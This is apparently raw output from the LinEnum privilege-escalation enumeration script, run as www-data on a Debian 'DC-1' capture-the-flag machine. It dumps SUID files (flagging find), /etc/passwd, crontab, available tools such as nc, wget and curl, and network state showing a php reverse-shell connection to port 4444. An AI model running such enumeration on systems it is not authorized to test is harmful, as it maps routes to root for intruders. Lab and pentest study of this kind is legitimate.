permissions:[00m 431 total 280 432 drwxr-xr-x 2 root root 4096 Feb 19 23:01 . 433 drwxr-xr-x 85 root root 4096 May 7 00:08 .. 434 -rw-r--r-- 1 root root 1586 Feb 19 23:02 .depend.boot 435 -rw-r--r-- 1 root root 669 Feb 19 23:02 .depend.start 436 -rw-r--r-- 1 root root 769 Feb 19 23:02 .depend.stop 437 -rw-r--r-- 1 root root 2427 Oct 16 2012 README 438 -rwxr-xr-x 1 root root 2227 Apr 16 2013 acpid 439 -rwxr-xr-x 1 root root 7820 May 26 2018 apache2 440 -rwxr-xr-x 1 root root 1071 Jun 25 2011 atd 441 -rwxr-xr-x 1 root root 1276 Oct 16 2012 bootlogs 442 -rwxr-xr-x 1 root root 1281 Jul 15 2013 bootmisc.sh 443 -rwxr-xr-x 1 root root 3816 Jul 15 2013 checkfs.sh 444 -rwxr-xr-x 1 root root 1099 Jul 15 2013 checkroot-bootclean.sh 445 -rwxr-xr-x 1 root root 9673 Jul 15 2013 checkroot.sh 446 -rwxr-xr-x 1 root root 1379 Dec 9 2011 console-setup 447 -rwxr-xr-x 1 root root 3033 Jul 3 2012 cron 448 -rwxr-xr-x 1 root root 2813 Feb 6 2015 dbus 449 -rwxr-xr-x 1 root root 6435 Feb 11 2018 exim4 450 -rwxr-xr-x 1 root root 1329 Oct 16 2012 halt 451 -rwxr-xr-x 1 root root 1423 Oct 16 2012 hostname.sh 452 -rwxr-xr-x 1 root root 3880 Dec 10 2012 hwclock.sh 453 -rwxr-xr-x 1 root root 7592 Apr 28 2012 kbd 454 -rwxr-xr-x 1 root root 1591 Oct 1 2012 keyboard-setup 455 -rwxr-xr-x 1 root root 1293 Oct 16 2012 killprocs 456 -rwxr-xr-x 1 root root 1990 May 21 2012 kmod 457 -rwxr-xr-x 1 root root 2405 Sep 26 2016 mcstrans 458 -rwxr-xr-x 1 root root 995 Oct 16 2012 motd 459 -rwxr-xr-x 1 root root 670 Feb 24 2013 mountall-bootclean.sh 460 -rwxr-xr-x 1 root root 2128 Feb 24 2013 mountall.sh 461 -rwxr-xr-x 1 root root 1508 Jul 15 2013 mountdevsubfs.sh 462 -rwxr-xr-x 1 root root 1413 Jul 15 2013 mountkernfs.sh 463 -rwxr-xr-x 1 root root 678 Feb 24 2013 mountnfs-bootclean.sh 464 -rwxr-xr-x 1 root root 2440 Oct 16 2012 mountnfs.sh 465 -rwxr-xr-x 1 root root 1731 Jul 15 2013 mtab.sh 466 -rwxr-xr-x 1 root root 5437 Apr 19 2018 mysql 467 -rwxr-xr-x 1 root root 4322 Mar 14 2013 networking 468 -rwxr-xr-x 1 root root 6491 May 22 2013 nfs-common 469 -rwxr-xr-x 1 root root 1346 May 20 2012 procps 470 -rwxr-xr-x 1 root root 6120 Oct 16 2012 rc 471 -rwxr-xr-x 1 root root 782 Oct 16 2012 rc.local 472 -rwxr-xr-x 1 root root 117 Oct 16 2012 rcS 473 -rwxr-xr-x 1 root root 639 Oct 16 2012 reboot 474 -rwxr-xr-x 1 root root 2727 Sep 26 2016 restorecond 475 -rwxr-xr-x 1 root root 1074 Jul 15 2013 rmnologin 476 -rwxr-xr-x 1 root root 2344 May 10 2017 rpcbind 477 -rwxr-xr-x 1 root root 3054 Oct 8 2014 rsyslog 478 -rwxr-xr-x 1 root root 3200 Oct 16 2012 sendsigs 479 -rwxr-xr-x 1 root root 590 Oct 16 2012 single 480 -rw-r--r-- 1 root root 4290 Oct 16 2012 skeleton 481 -rwxr-xr-x 1 root root 3881 Apr 15 2016 ssh 482 -rwxr-xr-x 1 root root 8827 Nov 9 2012 udev 483 -rwxr-xr-x 1 root root 1179 Aug 20 2012 udev-mtab 484 -rwxr-xr-x 1 root root 2721 Apr 10 2013 umountfs 485 -rwxr-xr-x 1 root root 2195 Apr 10 2013 umountnfs.sh 486 -rwxr-xr-x 1 root root 1122 Oct 16 2012 umountroot 487 -rwxr-xr-x 1 root root 3111 Oct 16 2012 urandom 488 -rwxr-xr-x 1 root root 1364 Oct 26 2015 virtualbox-guest-utils 489 -rwxr-xr-x 1 root root 2666 Mar 3 2012 x11-common 490 491 492 [00;31m[-] /etc/init/ config file permissions:[00m 493 total 48 494 drwxr-xr-x 2 root root 4096 Feb 19 22:25 . 495 drwxr-xr-x 85 root root 4096 May 7 00:08 .. 496 -rw-r--r-- 1 root root 523 Mar 14 2013 network-interface-container.conf 497 -rw-r--r-- 1 root root 1603 Mar 14 2013 network-interface-security.conf 498 -rw-r--r-- 1 root root 803 Mar 14 2013 network-interface.conf 499 -rw-r--r-- 1 root root 1898 Mar 14 2013 networking.conf 500 -rw-r--r-- 1 root root 567 Feb 24 2013 startpar-bridge.conf 501 -rw-r--r-- 1 root root 637 Nov 5 2012 udev-fallback-graphics.conf 502 -rw-r--r-- 1 root root 769 Nov 5 2012 udev-finish.conf 503 -rw-r--r-- 1 root root 322 Nov 5 2012 udev.conf 504 -rw-r--r-- 1 root root 356 Nov 5 2012 udevmonitor.conf 505 -rw-r--r-- 1 root root 352 Nov 5 2012 udevtrigger.conf 506 507 508 [00;31m[-] /lib/systemd/* config file permissions:[00m 509 /lib/systemd/: 510 total 4.0K 511 drwxr-xr-x 6 root root 4.0K Feb 19 22:43 system 512 513 /lib/systemd/system: 514 total 56K 515 drwxr-xr-x 2 root root 4.0K Feb 19 22:43 dbus.target.wants 516 drwxr-xr-x 2 root root 4.0K Feb 19 22:43 multi-user.target.wants 517 drwxr-xr-x 2 root root 4.0K Feb 19 22:43 sockets.target.wants 518 drwxr-xr-x 2 root root 4.0K Feb 19 22:25 basic.target.wants 519 -rw-r--r-- 1 root root 353 Feb 10 2015 dbus.service 520 -rw-r--r-- 1 root root 106 Feb 10 2015 dbus.socket 521 -rw-r--r-- 1 root root 190 Oct 8 2014 rsyslog.service 522 -rw-r--r-- 1 root root 164 Apr 29 2013 udev-control.socket 523 -rw-r--r-- 1 root root 177 Apr 29 2013 udev-kernel.socket 524 -rw-r--r-- 1 root root 752 Apr 29 2013 udev-settle.service 525 -rw-r--r-- 1 root root 291 Apr 29 2013 udev-trigger.service 526 -rw-r--r-- 1 root root 384 Apr 29 2013 udev.service 527 -rw-r--r-- 1 root root 155 Apr 16 2013 acpid.service 528 -rw-r--r-- 1 root root 115 Apr 16 2013 acpid.socket 529 530 /lib/systemd/system/dbus.target.wants: 531 total 0 532 lrwxrwxrwx 1 root root 14 Feb 10 2015 dbus.socket -> ../dbus.socket 533 534 /lib/systemd/system/multi-user.target.wants: 535 total 0 536 lrwxrwxrwx 1 root root 15 Feb 10 2015 dbus.service -> ../dbus.service 537 538 /lib/systemd/system/sockets.target.wants: 539 total 0 540 lrwxrwxrwx 1 root root 14 Feb 10 2015 dbus.socket -> ../dbus.socket 541 lrwxrwxrwx 1 root root 22 Apr 29 2013 udev-control.socket -> ../udev-control.socket 542 lrwxrwxrwx 1 root root 21 Apr 29 2013 udev-kernel.socket -> ../udev-kernel.socket 543 544 /lib/systemd/system/basic.target.wants: 545 total 0 546 lrwxrwxrwx 1 root root 23 Apr 29 2013 udev-trigger.service -> ../udev-trigger.service 547 lrwxrwxrwx 1 root root 15 Apr 29 2013 udev.service -> ../udev.service 548 549 550 [00;33m### SOFTWARE #############################################[00m 551 [00;31m[-] MYSQL version:[00m 552 mysql Ver 14.14 Distrib 5.5.60, for debian-linux-gnu (i686) using readline 6.2 553 554 555 [00;31m[-] Apache user configuration:[00m 556 APACHE_RUN_USER=www-data 557 APACHE_RUN_GROUP=www-data 558 559 560 [00;33m### INTERESTING FILES ####################################[00m 561 [00;31m[-] Useful file locations:[00m 562 /bin/nc 563 /bin/netcat 564 /usr/bin/wget 565 /usr/bin/gcc 566 /usr/bin/curl 567 568 569 [00;31m[-] Installed compilers:[00m 570 ii checkpolicy 2.1.8-2 i386 SELinux policy compiler 571 ii gcc 4:4.7.2-1 i386 GNU C compiler 572 ii gcc-4.7 4.7.2-5 i386 GNU C compiler 573 ii gcc-4.7-multilib 4.7.2-5 i386 GNU C compiler (multilib files) 574 ii gcc-multilib 4:4.7.2-1 i386 GNU C compiler (multilib files) 575 576 577 [00;31m[-] Can we read/write sensitive files:[00m 578 -rw-r--r-- 1 root root 1057 Feb 19 23:51 /etc/passwd 579 -rw-r--r-- 1 root root 612 Feb 19 23:51 /etc/group 580 -rw-r--r-- 1 root root 851 Jul 30 2011 /etc/profile 581 -rw-r----- 1 root shadow 870 Feb 28 12:10 /etc/shadow 582 583 584 [00;31m[-] SUID files:[00m 585 -rwsr-xr-x 1 root root 88744 Dec 10 2012 /bin/mount 586 -rwsr-xr-x 1 root root 31104 Apr 13 2011 /bin/ping 587 -rwsr-xr-x 1 root root 35200 Feb 27 2017 /bin/su 588 -rwsr-xr-x 1 root root 35252 Apr 13 2011 /bin/ping6 589 -rwsr-xr-x 1 root root 67704 Dec 10 2012 /bin/umount 590 -rwsr-sr-x 1 daemon daemon 50652 Oct 4 2014 /usr/bin/at 591 -rwsr-xr-x 1 root root 35892 Feb 27 2017 /usr/bin/chsh 592 -rwsr-xr-x 1 root root 45396 Feb 27 2017 /usr/bin/passwd 593 -rwsr-xr-x 1 root root 30880 Feb 27 2017 /usr/bin/newgrp 594 -rwsr-xr-x 1 root root 44564 Feb 27 2017 /usr/bin/chfn 595 -rwsr-xr-x 1 root root 66196 Feb 27 2017 /usr/bin/gpasswd 596 -rwsr-sr-x 1 root mail 83912 Nov 18 2017 /usr/bin/procmail 597 -rwsr-xr-x 1 root root 162424 Jan 6 2012 /usr/bin/find 598 -rwsr-xr-x 1 root root 937564 Feb 11 2018 /usr/sbin/exim4 599 -rwsr-xr-x 1 root root 9660 Jun 20 2017 /usr/lib/pt_chown 600 -rwsr-xr-x 1 root root 248036 Jan 27 2018 /usr/lib/openssh/ssh-keysign 601 -rwsr-xr-x 1 root root 5412 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device 602 -rwsr-xr-- 1 root messagebus 321692 Feb 10 2015 /usr/lib/dbus-1.0/dbus-daemon-launch-helper 603 -rwsr-xr-x 1 root root 84532 May 22 2013 /sbin/mount.nfs 604 605 606 [00;33m[+] Possibly interesting SUID files:[00m 607 -rwsr-xr-x 1 root root 162424 Jan 6 2012 /usr/bin/find 608 609 610 [00;31m[-] SGID files:[00m 611 -rwxr-sr-x 1 root ssh 128396 Jan 27 2018 /usr/bin/ssh-agent 612 -rwsr-sr-x 1 daemon daemon 50652 Oct 4 2014 /usr/bin/at 613 -rwxr-sr-x 1 root mlocate 30492 Sep 25 2010 /usr/bin/mlocate 614 -rwxr-sr-x 1 root mail 17908 Nov 18 2017 /usr/bin/lockfile 615 -rwxr-sr-x 1 root shadow 49364 Feb 27 2017 /usr/bin/chage 616 -rwxr-sr-x 1 root tty 9708 Jun 11 2012 /usr/bin/bsd-write 617 -rwxr-sr-x 1 root mail 9768 Nov 30 2014 /usr/bin/mutt_dotlock 618 -rwxr-sr-x 1 root tty 18020 Dec 10 2012 /usr/bin/wall 619 -rwxr-sr-x 1 root crontab 34760 Jul 4 2012 /usr/bin/crontab 620 -rwxr-sr-x 1 root shadow 18168 Feb 27 2017 /usr/bin/expiry 621 -rwsr-sr-x 1 root mail 83912 Nov 18 2017 /usr/bin/procmail 622 -rwxr-sr-x 1 root mail 13960 Dec 12 2012 /usr/bin/dotlockfile 623 -rwxr-sr-x 1 root utmp 4972 Feb 21 2011 /usr/lib/utempter/utempter 624 -rwxr-sr-x 1 root shadow 30332 May 5 2012 /sbin/unix_chkpwd 625 626 627 [-] Can't search *.conf files as no keyword was entered 628 629 [-] Can't search *.php files as no keyword was entered 630 631 [-] Can't search *.log files as no keyword was entered 632 633 [-] Can't search *.ini files as no keyword was entered 634 635 [00;31m[-] All *.conf files in /etc (recursive 1 level):[00m 636 -rw-r--r-- 1 root root 45 May 7 01:08 /etc/resolv.conf 637 -rw-r--r-- 1 root root 346 Mar 31 2012 /etc/discover-modprobe.conf 638 -rw-r--r-- 1 root root 216 Sep 26 2016 /etc/sestatus.conf 639 -rw-r--r-- 1 root root 1260 May 30 2008 /etc/ucf.conf 640 -rw-r--r-- 1 root root 834 Jun 8 2012 /etc/gssapi_mech.conf 641 -rw-r--r-- 1 root root 859 Nov 24 2012 /etc/insserv.conf 642 -rw-r--r-- 1 root root 144 Feb 19 22:55 /etc/kernel-img.conf 643 -rw-r--r-- 1 root root 3173 Dec 16 2017 /etc/reportbug.conf 644 -rw-r--r-- 1 root root 599 Feb 19 2009 /etc/logrotate.conf 645 -rw-r--r-- 1 root root 6895 Feb 19 22:44 /etc/ca-certificates.conf 646 -rw-r--r-- 1 root root 284 Sep 25 2010 /etc/updatedb.conf 647 -rw-r--r-- 1 root root 191 Feb 1 2012 /etc/libaudit.conf 648 -rw-r--r-- 1 root root 604 May 16 2012 /etc/deluser.conf 649 -rw-r--r-- 1 root root 2940 Feb 12 2016 /etc/gai.conf 650 -rw-r--r-- 1 root root 2632 Oct 8 2014 /etc/rsyslog.conf 651 -rw-r--r-- 1 root root 2082 May 20 2012 /etc/sysctl.conf 652 -rw-r--r-- 1 root root 214 May 11 2013 /etc/idmapd.conf 653 -rw-r--r-- 1 root root 956 Feb 22 2015 /etc/mke2fs.conf 654 -rw-r--r-- 1 root root 552 Apr 30 2012 /etc/pam.conf 655 -rw-r--r-- 1 root root 2981 Feb 19 22:25 /etc/adduser.conf 656 -rw-r--r-- 1 root root 2969 Dec 26 2012 /etc/debconf.conf 657 -rw-r--r-- 1 root root 9 Aug 8 2006 /etc/host.conf 658 -rw-r--r-- 1 root root 34 Feb 19 22:24 /etc/ld.so.conf 659 -rw-r--r-- 1 root root 475 Aug 29 2006 /etc/nsswitch.conf 660 661 662 [00;31m[-] Location and contents (if accessible) of .bash_history file(s):[00m 663 /home/flag4/.bash_history 664 cd 665 ls 666 vi flag4.txt 667 ls 668 exit 669 670 671 [00;31m[-] Any interesting mail in /var/mail:[00m 672 total 8 673 drwxrwsr-x 2 root mail 4096 Feb 19 22:24 . 674 drwxr-xr-x 12 root root 4096 Feb 19 23:10 .. 675 676 677 [00;33m### SCAN COMPLETE ####################################[00m 678 679 [00;31m#########################################################[00m 680 [00;31m#[00m [00;33mLocal Linux Enumeration & Privilege Escalation Script[00m [00;31m#[00m 681 [00;31m#########################################################[00m 682 [00;33m# www.rebootuser.com[00m 683 [00;33m# version 0.95[00m 684 685 [-] Debug Info 686 [00;33m[+] Thorough tests = Disabled[00m 687 688 689 [00;33mScan started at: 690 Tue May 7 01:08:52 AEST 2019 691 [00m 692 693 [00;33m### SYSTEM ##############################################[00m 694 [00;31m[-] Kernel information:[00m 695 Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686 GNU/Linux 696 697 698 [00;31m[-] Kernel information (continued):[00m 699 Linux version 3.2.0-6-486 (debian-kernel@lists.debian.org) (gcc version 4.9.2 (Debian 4.9.2-10+deb7u1) ) #1 Debian 3.2.102-1 700 701 702 [00;31m[-] Specific release information:[00m 703 PRETTY_NAME="Debian GNU/Linux 7 (wheezy)" 704 NAME="Debian GNU/Linux" 705 VERSION_ID="7" 706 VERSION="7 (wheezy)" 707 ID=debian 708 ANSI_COLOR="1;31" 709 HOME_URL="http://www.debian.org/" 710 SUPPORT_URL="http://www.debian.org/support/" 711 BUG_REPORT_URL="http://bugs.debian.org/" 712 713 714 [00;31m[-] Hostname:[00m 715 DC-1 716 717 718 [00;33m### USER/GROUP ##########################################[00m 719 [00;31m[-] Current user/group info:[00m 720 uid=33(www-data) gid=33(www-data) groups=33(www-data) 721 722 723 [00;31m[-] Users that have previously logged onto the system:[00m 724 Username Port From Latest 725 root tty1 Thu Feb 28 12:10:51 +1000 2019 726 727 728 [00;31m[-] Who else is logged on:[00m 729 01:08:52 up 1:00, 0 users, load average: 0.00, 0.00, 0.00 730 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT 731 732 733 [00;31m[-] Group memberships:[00m 734 uid=0(root) gid=0(root) groups=0(root) 735 uid=1(daemon) gid=1(daemon) groups=1(daemon) 736 uid=2(bin) gid=2(bin) groups=2(bin) 737 uid=3(sys) gid=3(sys) groups=3(sys) 738 uid=4(sync) gid=65534(nogroup) groups=65534(nogroup) 739 uid=5(games) gid=60(games) groups=60(games) 740 uid=6(man) gid=12(man) groups=12(man) 741 uid=7(lp) gid=7(lp) groups=7(lp) 742 uid=8(mail) gid=8(mail) groups=8(mail) 743 uid=9(news) gid=9(news) groups=9(news) 744 uid=10(uucp) gid=10(uucp) groups=10(uucp) 745 uid=13(proxy) gid=13(proxy) groups=13(proxy) 746 uid=33(www-data) gid=33(www-data) groups=33(www-data) 747 uid=34(backup) gid=34(backup) groups=34(backup) 748 uid=38(list) gid=38(list) groups=38(list) 749 uid=39(irc) gid=39(irc) groups=39(irc) 750 uid=41(gnats) gid=41(gnats) groups=41(gnats) 751 uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) 752 uid=100(libuuid) gid=101(libuuid) groups=101(libuuid) 753 uid=101(Debian-exim) gid=104(Debian-exim) groups=104(Debian-exim) 754 uid=102(statd) gid=65534(nogroup) groups=65534(nogroup) 755 uid=103(messagebus) gid=107(messagebus) groups=107(messagebus) 756 uid=104(sshd) gid=65534(nogroup) groups=65534(nogroup) 757 uid=105(mysql) gid=109(mysql) groups=109(mysql) 758 uid=1001(flag4) gid=1001(flag4) groups=1001(flag4) 759 760 761 [00;31m[-] Contents of /etc/passwd:[00m 762 root:x:0:0:root:/root:/bin/bash 763 daemon:x:1:1:daemon:/usr/sbin:/bin/sh 764 bin:x:2:2:bin:/bin:/bin/sh 765 sys:x:3:3:sys:/dev:/bin/sh 766 sync:x:4:65534:sync:/bin:/bin/sync 767 games:x:5:60:games:/usr/games:/bin/sh 768 man:x:6:12:man:/var/cache/man:/bin/sh 769 lp:x:7:7:lp:/var/spool/lpd:/bin/sh 770 mail:x:8:8:mail:/var/mail:/bin/sh 771 news:x:9:9:news:/var/spool/news:/bin/sh 772 uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh 773 proxy:x:13:13:proxy:/bin:/bin/sh 774 www-data:x:33:33:www-data:/var/www:/bin/sh 775 backup:x:34:34:backup:/var/backups:/bin/sh 776 list:x:38:38:Mailing List Manager:/var/list:/bin/sh 777 irc:x:39:39:ircd:/var/run/ircd:/bin/sh 778 gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh 779 nobody:x:65534:65534:nobody:/nonexistent:/bin/sh 780 libuuid:x:100:101::/var/lib/libuuid:/bin/sh 781 Debian-exim:x:101:104::/var/spool/exim4:/bin/false 782 statd:x:102:65534::/var/lib/nfs:/bin/false 783 messagebus:x:103:107::/var/run/dbus:/bin/false 784 sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin 785 mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false 786 flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash 787 788 789 [00;31m[-] Super user account(s):[00m 790 root 791 792 793 [00;31m[-] Are permissions on /home directories lax:[00m 794 total 12K 795 drwxr-xr-x 3 root root 4.0K Feb 19 23:51 . 796 drwxr-xr-x 23 root root 4.0K Feb 19 22:34 .. 797 drwxr-xr-x 2 flag4 flag4 4.0K Feb 19 23:28 flag4 798 799 800 [00;31m[-] Root is allowed to login via SSH:[00m 801 PermitRootLogin yes 802 803 804 [00;33m### ENVIRONMENTAL #######################################[00m 805 [00;31m[-] Environment information:[00m 806 APACHE_PID_FILE=/var/run/apache2.pid 807 APACHE_RUN_USER=www-data 808 APACHE_LOG_DIR=/var/log/apache2 809 PATH=/usr/local/bin:/usr/bin:/bin 810 PWD=/var/www 811 APACHE_RUN_GROUP=www-data 812 LANG=C 813 SHLVL=1 814 APACHE_LOCK_DIR=/var/lock/apache2 815 APACHE_RUN_DIR=/var/run/apache2 816 _=/usr/bin/env 817 818 819 [00;31m[-] Path information:[00m 820 /usr/local/bin:/usr/bin:/bin 821 822 823 [00;31m[-] Available shells:[00m 824 # /etc/shells: valid login shells 825 /bin/sh 826 /bin/dash 827 /bin/bash 828 /bin/rbash 829 830 831 [00;31m[-] Current umask value:[00m 832 0022 833 u=rwx,g=rx,o=rx 834 835 836 [00;31m[-] umask value as specified in /etc/login.defs:[00m 837 UMASK 022 838 839 840 [00;31m[-] Password and storage information:[00m 841 PASS_MAX_DAYS 99999 842 PASS_MIN_DAYS 0 843 PASS_WARN_AGE 7 844 ENCRYPT_METHOD SHA512 845 846 847 [00;33m### JOBS/TASKS ##########################################[00m 848 [00;31m[-] Cron jobs:[00m 849 -rw-r--r-- 1 root root 722 Jul 4 2012 /etc/crontab 850 851 /etc/cron.d: 852 total 16 853 drwxr-xr-x 2 root root 4096 Feb 19 23:01 . 854 drwxr-xr-x 85 root root 4096 May 7 01:08 .. 855 -rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder 856 -rw-r--r-- 1 root root 510 May 10 2018 php5 857 858 /etc/cron.daily: 859 total 68 860 drwxr-xr-x 2 root root 4096 Feb 19 23:01 . 861 drwxr-xr-x 85 root root 4096 May 7 01:08 .. 862 -rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder 863 -rwxr-xr-x 1 root root 633 May 30 2018 apache2 864 -rwxr-xr-x 1 root root 14985 Oct 24 2014 apt 865 -rwxr-xr-x 1 root root 314 Nov 5 2012 aptitude 866 -rwxr-xr-x 1 root root 355 Jun 11 2012 bsdmainutils 867 -rwxr-xr-x 1 root root 256 May 3 2016 dpkg 868 -rwxr-xr-x 1 root root 4125 Feb 11 2018 exim4-base 869 -rwxr-xr-x 1 root root 89 May 17 2012 logrotate 870 -rwxr-xr-x 1 root root 1365 Jun 19 2012 man-db 871 -rwxr-xr-x 1 root root 606 Sep 25 2010 mlocate 872 -rwxr-xr-x 1 root root 249 May 26 2012 passwd 873 874 /etc/cron.hourly: 875 total 12 876 drwxr-xr-x 2 root root 4096 Feb 19 22:25 . 877 drwxr-xr-x 85 root root 4096 May 7 01:08 .. 878 -rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder 879 880 /etc/cron.monthly: 881 total 12 882 drwxr-xr-x 2 root root 4096 Feb 19 22:25 . 883 drwxr-xr-x 85 root root 4096 May 7 01:08 .. 884 -rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder 885 886 /etc/cron.weekly: 887 total 16 888 drwxr-xr-x 2 root root 4096 Feb 19 22:25 . 889 drwxr-xr-x 85 root root 4096 May 7 01:08 .. 890 -rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder 891 -rwxr-xr-x 1 root root 907 Jun 19 2012 man-db 892 893 894 [00;31m[-] Crontab contents:[00m 895 # /etc/crontab: system-wide crontab 896 # Unlike any other crontab you don't have to run the `crontab' 897 # command to install the new version when you edit this file 898 # and files in /etc/cron.d. These files also have username fields, 899 # that none of the other crontabs do. 900 901 SHELL=/bin/sh 902 PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin 903 904 # m h dom mon dow user command 905 17 * * * * root cd / && run-parts --report /etc/cron.hourly 906 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 907 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 908 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) 909 # 910 911 912 [00;33m### NETWORKING ##########################################[00m 913 [00;31m[-] Network and IP info:[00m 914 eth0 Link encap:Ethernet HWaddr 00:0c:29:d1:f4:98 915 inet addr:192.168.16.107 Bcast:192.168.16.255 Mask:255.255.255.0 916 inet6 addr: fe80::20c:29ff:fed1:f498/64 Scope:Link 917 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 918 RX packets:8711 errors:0 dropped:0 overruns:0 frame:0 919 TX packets:3014 errors:0 dropped:0 overruns:0 carrier:0 920 collisions:0 txqueuelen:1000 921 RX bytes:1327204 (1.2 MiB) TX bytes:1104845 (1.0 MiB) 922 923 lo Link encap:Local Loopback 924 inet addr:127.0.0.1 Mask:255.0.0.0 925 inet6 addr: ::1/128 Scope:Host 926 UP LOOPBACK RUNNING MTU:16436 Metric:1 927 RX packets:50 errors:0 dropped:0 overruns:0 frame:0 928 TX packets:50 errors:0 dropped:0 overruns:0 carrier:0 929 collisions:0 txqueuelen:0 930 RX bytes:4852 (4.7 KiB) TX bytes:4852 (4.7 KiB) 931 932 933 [00;31m[-] ARP history:[00m 934 192.168.16.112 dev eth0 INCOMPLETE 935 936 937 [00;31m[-] Nameserver(s):[00m 938 nameserver 192.168.16.254 939 nameserver 0.0.0.0 940 941 942 [00;31m[-] Default route:[00m 943 default via 192.168.16.254 dev eth0 944 945 946 [00;31m[-] Listening TCP:[00m 947 Active Internet connections (servers and established) 948 Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name 949 tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - 950 tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN - 951 tcp 0 0 0.0.0.0:40858 0.0.0.0:* LISTEN - 952 tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN - 953 tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN - 954 tcp 0 480 192.168.16.107:33469 192.168.16.112:4444 ESTABLISHED 3406/php 955 tcp6 0 0 :::22 :::* LISTEN - 956 tcp6 0 0 ::1:25 :::* LISTEN - 957 tcp6 0 0 :::34190 :::* LISTEN - 958 tcp6 0 0 :::111 :::* LISTEN - 959 tcp6 0 0 :::80 :::* LISTEN - 960 tcp6 0 0 192.168.16.107:80 192.168.16.112:52090 TIME_WAIT - 961 tcp6 1 0 192.168.16.107:80 192.168.16.112:63539 CLOSE_WAIT - 962 963 964 [00;31m[-] Listening UDP:[00m 965 Active Internet connections (servers and established) 966 Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name 967 udp 0 0 0.0.0.0:59942 0.0.0.0:* - 968 udp 0 0 0.0.0.0:68 0.0.0.0:* - 969 udp 0 0 0.0.0.0:111 0.0.0.0:* - 970 udp 0 0 0.0.0.0:769 0.0.0.0:* - 971 udp 0 0 127.0.0.1:801 0.0.0.0:* - 972 udp 0 0 0.0.0.0:21881 0.0.0.0:* - 973 udp6 0 0 :::52815 :::* - 974 udp6 0 0 :::28256 :::* - 975 udp6 0 0 :::111 :::* - 976 udp6 0 0 :::769 :::* - 977 978 979 [00;33m### SERVICES #############################################[00m 980 [00;31m[-] Running processes:[00m 981 USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND 982 root 1 0.0 0.0 2296 780 ? Ss 00:08 0:01 init [2] 983 root 2 0.0 0.0 0 0 ? S 00:08 0:00 [kthreadd] 984 root 3 0.0 0.0 0 0 ? S 00:08 0:00 [ksoftirqd/0] 985 root 4 0.0 0.0 0 0 ? S 00:08 0:00 [kworker/0:0] 986 root 6 0.0 0.0 0 0 ? S 00:08 0:00 [watchdog/0] 987 root 7 0.0 0.0 0 0 ? S< 00:08 0:00 [cpuset] 988 root 8 0.0 0.0 0 0 ? S< 00:08 0:00 [khelper] 989 root 9 0.0 0.0 0 0 ? S 00:08 0:00 [kdevtmpfs] 990 root 10 0.0 0.0 0 0 ? S< 00:08 0:00 [netns] 991 root 11 0.0 0.0 0 0 ? S 00:08 0:00 [sync_supers] 992 root 12 0.0 0.0 0 0 ? S 00:08 0:00 [bdi-default] 993 root 13 0.0 0.0 0 0 ? S< 00:08 0:00 [kintegrityd] 994 root 14 0.0 0.0 0 0 ? S< 00:08 0:00 [kblockd] 995 root 15 0.0 0.0 0 0 ? S 00:08 0:00 [khungtaskd] 996 root 16 0.0 0.0 0 0 ? S 00:08 0:00 [kswapd0] 997 root 17 0.0 0.0 0 0 ? SN 00:08 0:00 [ksmd] 998 root 18 0.0 0.0 0 0 ? S 00:08 0:00 [fsnotify_mark] 999 root 19 0.0 0.0 0 0 ? S< 00:08 0:00 [crypto] 1000 root 95 0.0 0.0 0 0 ? S 00:08 0:00 [khubd] 1001 root 105 0.0 0.0 0 0 ? S< 00:08 0:00 [ata_sff] 1002 root 115 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_0] 1003 root 125 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_1] 1004 root 134 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_2] 1005 root 135 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_3] 1006 root 136 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_4] 1007 root 137 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_5] 1008 root 138 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_6] 1009 root 139 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_7] 1010 root 140 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_8] 1011 root 141 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_9] 1012 root 142 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_10] 1013 root 143 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_11] 1014 root 144 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_12] 1015 root 145 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_13] 1016 root 146 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_14] 1017 root 147 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_15] 1018 root 148 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_16] 1019 root 149 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_17] 1020 root 150 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_18] 1021 root 151 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_19] 1022 root 152 